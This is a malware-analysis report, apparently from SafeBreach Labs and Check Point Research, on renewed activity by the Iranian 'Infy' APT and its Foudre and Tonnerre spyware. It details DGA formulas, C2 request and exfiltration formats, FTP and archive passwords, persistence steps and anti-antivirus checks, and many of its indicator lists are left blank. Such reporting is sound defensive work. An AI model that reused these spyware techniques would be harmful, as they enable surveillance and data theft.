Feb 8, 2021

After Lightning Comes Thunder

The Most Persistent Iranian APT Rumbling Again


Cyber warfare has long become a common practice in the arsenal of governments, armies, and intelligence agencies around the world. What once used to be a black art, reserved to the elite of the elite and conducted by few, has now become a land of opportunities for almost any government around the world. Iran is no exception to this trend, with new discoveries made every year repeatedly attributed to the Islamic republic..

One of the earliest Iranian cyber operations that was ever brought to light was “Infy” (aka “Prince of Persia”). Evidence for activities of this operation dates back to 2007. This cyber operation was very active since its early stages, and was shown to target victims mainly in Iran and throughout Europe, and was likely a government-backed operation.

In this research, which is a cooperation between SafeBreach Labs and Check Point Research, we identify evidence of renewed activity by this operation. It seems that following a long downtime, the Iranian cyber attackers were able to regroup, fix previous issues and dramatically reinforce their OPSEC activities as well as the technical proficiency and tooling capabilities.

This report will shed new-light on this long lasting Iranian cyber operation – revealing new techniques used, the underlying infrastructure, stealth techniques and other new elements of this actor’s modus operandi.

Key findings:

  • A new, previously unknown, second stage malware with extended capabilities.
  • A more mature form of the known “Infy” malware family.
  • A review of recent C2 infrastructure including HTTP/FTP servers and RSA signatures.


In 2016, Palo Alto Networks’ Unit 42 discovered Infy, an APT which was presumed attributed to Iran and had an interesting choice of targets, amongst them US Government and Israeli companies. The operation’s activity had been traced all the way to 2007. At the time, Qi-Anxin focused on a specific attack targeting Danish diplomats, and named the attack Operation Mermaid, which covered the same methods and infrastructure.

After the publication, Unit 42 decided to conduct a takedown operation. This gave the researchers more visibility about the origin of victims, the motive of the attackers and the scope of the attack. The data gathered reaffirmed the Iranian connection – most victims were either in Iran, or were Iranian dissidents, and the attackers did not seem to be financially motivated. As a result of the takedown Infy lost access to almost all of the campaign victims.

Research by Claudio Guarnieri and Collin Anderson elaborated more on the Iranian attribution. The threat group compromised two news websites related to Jundallah as early as 2010, and exploited ActiveX vulnerabilities to attack the websites’ visitors. Infy seemed to have operated heavily around the 2013 Iranian Presidential elections, targeting Persian press members (such as BBC Persian), and resumed attacking civil society members and activists afterwards.

Guarnieri & Anderson also observed that after the takedown by Palo Alto Networks, the Telecommunication Company of Iran blocked and redirected any traffic originating from Iran and aimed at Palo Alto’s sinkholes. This was probably a deliberate attempt by the actors to reduce visibility and regain control of the victims. This is not an ability demonstrated by most threat actors (indeed, we are hard-pressed to find precedent for it), and it suggests a potential connection to the Iranian government.

Following these events, the operation wound down until August 2017, when Infy’s activity was observed again, this time through the use of a new malware dubbed Foudre.

Recent activity – lightning strikes again

During the first half of 2020, new versions of Foudre emerged with new documents designed to lure victims. These operated in a slightly different manner than before – instead of having the victim click on what appears to be a link to a video, the malware would run a macro once the victim closes the document.

Figure 1: Full infection chain

Figure 2: Example of a document sent to potential victims

One document (Figure 2) contained a photo of Mojtaba Biranvand, the governor of Dorud city in Lorestan Province, Iran. The document is in Persian and includes information regarding the governor’s office and his phone number (the number actually belongs to a lawyer in Lorestan).

Another document, also in Persian, contains the logo of ISAAR, the Iranian government-sponsored Foundation of Martyrs and Veterans Affairs which provides loans to disabled veterans and families of martyrs.

Figure 3: ISAAR document sent to potential victims

When the victim opens the document, a macro extracts the embedded package to the temp directory as fwupdate.temp and executes it after the document closes.

In 2018 Intezer covered Foudre version 8, which contained a certain sample labeled unknown binary that was not explored in Intezer’s research. In fact, this was a new component — called Tonnerre — which was a new step in the evolution of Infy, and contained various functionality absent from Foudre alone.


We used several methods to try and determine the current victims of Foudre & Tonnerre.

The first was registering the DGA domains ourselves, and listening to coming connections with the parameters the malware sent. We filtered out repeat connections, which were uncommon to the malware (these could indicate traffic generated by researchers – we can only speculate). Only a few dozen victims contacted our servers.

A curious point is that none of these victims were Iranian, which may indicate the attackers learned from the takedown and had the DNS records in Iran changed preemptively (although this, again, is purely speculation).

The second method we used to probe the campaign was passive DNS. That way we were able to see a broader scope of the attack. For example, we could see if some IP address was the origin of several resolution requests in succession, and in some cases if the connectivity check occurred right before attempting to connect to the C2 server. Ignoring traffic which doesn’t correlate with the correct dates for the domain, we were left with a handful of new victims. Two targets with persistent connectivity, as well as a connectivity check prior to contacting the C2, were in Turkey – one belongs to a University, and the other belongs to a state owned investment bank.

Below is the distribution of victims by geolocation. These correlate with previous findings on Infy, except for the glaring absence of Iranian victims.

Figure 4: Victim distribution by country

Foudre Known Versions

Version No. Timestamp Notes
Foundre 1-2 February 2017 Discovered by Palo Alto Networks in 2017
Foundre 3 October 2017  
Foundre 7 Probably April 2018 Newly Discovered
Foundre 8 August 2018 Discovered by Intezer in 2018
Foundre 20 April 2020 Newly Discovered
Foundre 21 July 2020  
Foundre 22 October 2020

Foudre Version Differences

Most differences include minor technical detail, such as Window names, Export function names and strings. However the latest versions of Foudre include some key differences:

  • DGA Formula – The updated algorithm for generating domains computes a CRC32 of the string NRV1{}{}{}.format(date.year, date.month, weeknumber), with a start date of December 27, 2018. The possible TLDs are: .space , .net,, .top. This is probably to evade detection of security vendors who are using the previously published DGA.
  • C2 RSA Verification – Foudre verifies the server is authentic by downloading a signature file, signed by the server and verifying it. This makes the operation more resilient against third-party takedowns.
  • Foudre string not present – In previous versions the window which was used for keylogging was named “Foudre”, which brought the malware its name. In the latest version, this was changed to “Form1”. This change could help the malware evade signature detection (and generally, this sort of thing should be kept in mind when writing signatures).

Figure 5 – Foudre version 20

Embedded articles

One of the discoveries that caught our eye during the analysis was a unique piece of text embedded in each of the binaries. This text was copied from various media websites from around the time when the binary was released. This finding can confirm that the date of the sample is at most as old as those articles.

Foudre version 21 included a text from an article published on July 29.

Figure 6 – July 2020 article embedded into Foudre version 21

Foudre version 22 had the next message, coming from an article published by the BBC:

Figure 7 – October 2020 article embedded into Foudre version 22

After connecting to the C2, Foudre downloads an encrypted self-extracting archive (SFX), and then decrypts and runs it. The SFX includes an executable and an RSA public key._

Tonnerre – Second-Stage Payload

Foudre’s new versions were downloading Tonnerre 11 as the payload, but the first two versions were also tracked. Version “10” is actually the earliest sample, which was dropped by Foudre 8. For more information, see Appendix B.

Version No.Time of emergenceNotes
10 – MaxPinnerAugust 2018From Foudre 8
1September 2018Newly discovered
2March 2019Newly discovered
11Probably July 2020Newly discovered – latest version

Tonnerre is used to expand the functionality of Foudre; possibly its functionality was put into a separate component to make sure it is deployed only when needed, and meets fewer prying eyes. Like Foudre, it is written in Delphi.

Its capabilities:

  • Steals files from predefined folders as well as external devices.
  • Executes commands from the C2 server.
  • Records sound.
  • Captures screen.

The executable is exceptionally large at 56Mb, and camouflages itself as legitimate software.

Version 1 is camouflaged as “SilverSoft Speed”, and version 11 as “Synaptics”.

Figure 8 – Tonnerre v.1 – Silversoft Speed

Like Foudre, Tonnerre has embedded strings from news articles which reinforces the notion that both tools come from the same developers.

Figure 9 – Tonnerre version 11 hardcoded strings

Similar to Foudre, Tonnerre uses a DGA to find its C2, and verifies it as a valid server using an RSA signature, which is decrypted with the public key from the SFX. Tonnerre uses this C2 to:

  • Store general metadata about the victim
  • Steal files with predefined extensions
  • Download updates.
  • Get an additional C2.

The second C2 is used to store the stolen data, and it can also provide a list of commands to run.

Communication to the first C2 uses HTTP, whereas the second C2 communicates using FTP. The FTP password is hardcoded in the malware, but the username is the name of the victim’s computer, which was previously sent to the HTTP C2.

Appendix A – Tonnerre deep dive


The malware contains 5 Delphi forms, with each one responsible for a different capability:

Form1 – Malware Installation and upgrading process.

The malware runs for the first time with param /set <machine GUID in hex>, creates an installation folder and copies itself as helper.exe. The second installation stage creates a link and runs its persistence mechanism:

  • A scheduled task for helper.exe -ex <machine GUID in hex>.
  • Registry “Run” key.

Running it with a wrong GUID, or on another machine will fail because the malware verifies that GUID value. It also verifies that the “Deep Freeze” process is not running, otherwise Tonnerre exits immediately. Tonnerre also checks for the presence of Kaspersky endpoint protection by looking for a “Kaspersky Lab” folder under %programfiles%. If this folder exists, the malware tries to bypass detection by performing a sleep cycle after setting its persistence.

Form2 – Collects files from predefined folders – Documents, Downloads, Pictures and more. It also sets a notify event for specific file types like MS Word files.

Files are also collected from network shares using WNetOpenEnumW and WNetEnumResourceW functions from mpr.dll. Print screens are also collected if the screen saver is not active at the moment of checking.

Form3 – Connects to an FTP server to exfiltrate collected data and get further commands.

Form4 – Collects files from removable devices for exfiltration. This is done by monitoring WM_DEVICECHANGE messages and enumerating the devices.

Form5 – Uses the lame command line tool to record sound. This is somewhat similar to another Iranian attributed APT, Nazar, which used it as a DLL. Despite this similarity, there doesn’t seem to be a link between the groups. The exact command line is: lame.exe -b 8 -m m rvfrtc8.tmp fcvd10v.tmp

C2 Communication


The dga start date is 12/25/2017 with the next TLDs: .site,.com,.win.

The domain is decided by the next formula: NITV1{}{}{}.format(date.year, date.month, weeknumber)

One of the generated C2 servers is Like all other domains since March 2020, this was resolved to the IP address 185.141.61[.]37.

The malware uses to get the current date for the DGA.

Receiving Executable Updates

First, just like Foudre, the malware verifies the HTTP C2 server by downloading a signature file using the next GET request: /s/?d=<days from first date>"&t=<timestamp>"

Next, after verifying the C2, the malware downloads the second signature file.

GET /2017/?c=<comp-name>&u=<user-name>&v=00011&f=fdir1&mi=<machine-guid>&t=<timestamp|> HTTP/1.1

The C2 server responds in a location field: update32.sig The sig file is downloaded from /2017/update32.sig

Finally, a request is sent to 2016/update32.tmp (this URL was not responsive when we checked). An SFX is downloaded, decrypted and executed, with a random looking password (in our case it was TtckjcAa54cE).

Getting the FTP Server

The malware gets the C2 FTP server IP address by performing the next request to the C2 server: GET /f/?c=<computer-name>&mi=<machine-guid>&t=<timestamp> HTTP/1.1

The C2 uses the same HTTP redirection with this response format: <year><days since last first dga day><.tmp> For example: 2020209.tmp.

It then performs a GET request to /f/2020209.tmp. Example for a downloaded file:





This file has 3 parts:

  1. The obfuscated FTP server. The IP could be retrieved easily using a python one-liner: print(bytes([ch-1 for ch in b'266/:5/321/93'])) which gives 155[.]94[.]210[.]82.
  2. An RSA signature of the FTP server.
  3. List of open ports on the FTP server.

From this point on, the malware uses that server to fetch its next command. After executing the command, the output is uploaded using FTP as well.

FTP Protocol


The malware connects to the FTP server using its computer name as the username and one of two fixed passwords: tpass15A42 or tpass14A43. The password can be decoded using the same Python snippet used for getting the FTP server.

Figure 10 – Deobfuscated FTP passwords

Command Execution

Command execution process is done by downloading a command file from the FTP server. We were able to enumerate the following commands:

  • MyIdle
  • MyDelete
  • MyRename
  • MyRun
  • MyEndTask
  • MyZip
  • MyShell
  • FTP – GET
  • FTP – PGET – get multiple files.
  • FTP – PUT – upload a file.
  • FTP – upload dirlist (using FTP put

Dual Data Exfiltration

Exfiltration of data which was collected based on the C2 server command is performed via FTP. Exfiltration of data collected otherwise (built in Tonnerre logic) is performed via HTTP POST request:

POST /blog/?<timestamp> HTTP/1.1

And the next data fields:

c=<computer-name>&u=<user-name>&v=00011&f=fdir1&mi=<machine-guid>&txt=<exfil data>&e=EOF

The C2 server response for a valid exfiltration is misleading: “There is a problem, the page you requested does not exist”

There are also custom 404 error response messages when requesting a valid directory in the server: “Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.”

Tonnerre searches for files based on the file extension:

Figure 11 – file types Tonnerre exfiltrates

Exfiltrated files

An example of the name of the file format is:

<file name crc32>-<file size>-<modified timeStamp>-<created timeStamp>

e.g. ceb60f97-53807-1597696028-1360110435 The exfiltrated data is in a format of a WideChar array, and should end with the following suffix:

<Computer name><user-name><version><directory><machine-guid><exfil file path>

The data also should be base64 encoded before put into the message body. The content is – base64 encoded zlib encrypted file content and after it the file’s metadata in hex: Computer name, username, Tonnere version, uploaded dir in c2 server, machine GUID and file path in the victim’s machine.

File and input capture and collection

The malware creates several directories to store the stolen files: “R”, “F”, “H”, “V”, “S”, “G”.

Figure 12 – The list of directories used for exfiltrated data: R,F,H,V,S

G = Grabbed (files from recycle bin)

.doc files grabbed from the recycle bin.

F = Fixed (all .doc files from supported drive types)

The drive types that are supported: fixed, remote, ramdisk, removable

S = Screen

Saved as psf files (Print Screen File).

H – files from predefined folders and network shares

Files from user directories (downloads, pictures, contacts) and from network shares are saved in H.

R = Recent files

Files that were written to the “Recent Items” folder, as enumerated in the Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Recent registry key.

V = Voice Recording

Used for the voice recordings generated by Form 5.

Appendix B – Foudre deep dive

Foudre version 20-22

C2 Protocol

As we showed previously, the C2 server is first authenticated by downloading a signature file obtained by querying the next HTTP GET request:

GET <C2 server host name>/de/?d2020209.sig&v=00020&t=<timestamp> HTTP/1.1

The server does HTTP redirection with the following value:

Location: <C2 server host name>/2020209.sig

This creates a GET request on this location:

GET /de/<C2 server host name>/2020209.sig HTTP/1.1

After the C2 server is verified as trusted, the malware checks for new versions of the malware by trying to download a second signature file. This is done by the next GET request:

https://<C2 server host name>/2015/?c=<computer name>&u=<username>&v=00020&s=Test201&f=datadir1&mi=<machine guid>&b=<os 64/32 bit arch>&t=<timestamp>

Figure 13 – July 2020 article embedded into Foudre version 21

The C2 server returns a signature file named t00011-3.sig, which refers to Tonnerre version 11. The final step is performing a request to download the latest version of the malware:

GET /2014/t00011-3.tmp HTTP/1.1

Figure 14 – July 2020 article embedded into Foudre version 21

The server responds with an encrypted RAR SFX file with the password RBA4b5a98Q. After decryption, we got the Tonnerre malware version 11 and a public key file. The size of the malware is 56MB, an unusual size for malware samples and which may allow it to avoid detection as many vendors ignore large files and won’t scan\monitor them.

Tonnerre 11 is the latest version served from the c2 as of our research. It has been using the exact same update file since at least as early as 27/7/20, and until at least as late as 14/11/20.

The path of the embedded object C:\Users\Alex\AppData\Local\Microsoft\Windows\INetCache\Content.Word\ was also used in an earlier Word dropper which drops Infy version 21:

Figure 16 – The embedded path into Version 21 document

Campaign Names

When we observed the HTTP requests, we could see the subject name “TehN005” which seems to have served as a sort of campaign ID:


Foudre Ver. 1 – 2017FSU

Foudre Ver. 2 – 17weh44 – (probably 2017 week 44)

Foudre Ver. 3 – af17818 – (probably 18/8/17) – was downloaded from the C2 https://eab6ff48[.]stream/update/af17818.tmp resolved to 185.148.144[.]3 (VirusTotal) which also resolved to This means that Foudre was downloaded from an additional host name <dga hostname>.streamWas probably sent by email – (virusTotal 2017-10-06 14:13:29 59bbae76 – email)

Foudre Ver. 4/5 – DynuSub (probably refers to the C2 domain

Foudre Ver. 7- S180313 – (probably 13/3/18)

Foudre Ver. 11 – Rec11-1 – (probably Recording version 11)

Foudre Ver. 20 – Test201 (Test 1 version 20)

Foudre Ver. 21 – TehN002 – (probably version Number 2)

Foudre Ver. 22 – TehN005 – (probably version Number 5)

SFX File

The executable file dropped by the above macros is an SFX File – Self-Extracting archive. When we decompress it, we get an extraordinary executable size – 275 MB.

Figure 17 – SFX content of Foudre 21

It uses rundll to load conf4389.dll (Foudre loader), which in turn runs DLL d488 and calls an exported function named f8754. The loader also creates a persistence mechanism by scheduling a task to run itself again.

Foudre 8 – Tonnerre first occurrence

As mentioned previously, Tonnerre was already deployed in Foudre version 8 that was featured in Intezer’s publication.

The attack vector chosen was an SFX embedded into an office document. In the later versions that we analyzed, the contents of the SFX were different.

Figure 18 – Content of Foudre 8 SFX c38533b85e4750e6f649cc407a50031de0984a8f3d5b90600824915433a5e218

The new SFX includes the following files:

  • I7234.dll is the initial loader.
  • d388 is the first loaded dll as Foudre version 8.
  • dfbpbtge.tmp is a sample with different capabilities which is the successor of past “Infy M” – used as a second stage payload.

Figure 19 – dfbptge.tmp – Tonnerre/“Max Pinner”

This loader executes what was defined by Intezer as an unknown binary. The execution of this binary happens only in the absence of the process dfserv.exe, which belongs to Faronics’ Deep Freeze.

The payload also checks if previous versions of this malware family are already installed on the victim’s computer. The check is done by searching for the window name Tonnerre from version 1 to 9.

The C2 server has a fixed hardcoded address instead of the usual DGA algorithm used by Foudre. The decrypted C2 is which probably explains why this version was named MaxPinner internally.

Figure 20 – dfbptge.tmp – Tonnerre appears for the first time

Figure 21 – dfbptge.tmp – fixed C2 server –

Foudre 7 – previously unknown

The sfx is quite different from other versions: It includes a white picture image file Thumbs.bmp which has a size of 63M probably to increase the size of the SFX. There is also a third dll, r3066, which is just used to call the D2 export of the main Foudre’s dll d392 instead of calling it from the loader dll i7765.dll.

The decoy movie is violent and is called shkanje46.mp4, which in Persian means trigger46 (another hint for the attacker attribution and the native language of the victim). Foudre 7 is the last version that used obfuscation of strings.

Figure 22 – Content of Foudre 7 SFX

Appendix C – IOCs


Foudre 3 dll


Foudre 4 dll




Foudre 5 dll



Foudre 7 dll


Foudre 11 dll


Foudre 20 dll


Foudre 21 dll


Foudre 22 dll

6931EE281C895BB9446689C8CB648E2ED353B06D454CFB4418490EF82CA07BF1 4853a8acc62d6586eddfb30dcbb97ffa82c5f65460708fd3a969c88e29f99160

impHash Foudre version 21-22 dll 78d9bed21db68b9d8c53b8f62bc5314f

Tonnerre 1 exe


Tonnerre 2 exe


Tonnerre 11 exe


Malicious Word doc with macro dropper
Version 22 dropper b97960c29b7c8234981728b80060a42dbe32bf625b052854a6cc2175467cca89

Version 21 dropper ccbda8a84dbeda1a66780c76fd9f507778c9fb992c7eee87e99cc3ca314009ee

Foudre SFX

Version 3


Version 7


Version 21


Version 22


Foudre Loaders

Version 7

Version 21 conf3234.dll


Version 22 conf4389.dll 9F64EC0C41623E5162E51D7631B1D29934B76984E9993083BDBDABFCCBA4D300

Version 22 identical to conf4389 but chopped suffix (1.1M instead of 4.3M)


All have imphash: 39507b319f55d0fec705f6dea39a0dfb

Tonnerre SFX


Tonnerre cert file


Foudre 20 C2 domains:



















Tonnerre 11 C2 domains:








IP Addresses
HTTP Servers
Foudre – active since 15/12/2020 – was active until 15/12/2020

Tonnerre – active since 6/1/21 – active until 6/1/21

FTP Servers – new server since 30/12/20

RSA Certificates

Tonnerre Public Certificate file content

4E 0A 4C 6F 63 6B 42 6F 78 33 01 00 00 00 03 00 01 00 00 51 F0 00 D8 97 48 C7 5B 0A BF F4 98 AB C6 1F 28 13 FC D7 C5 5E E4 A6 71 E

Foudre 20 embedded public key


Get the latest
research and news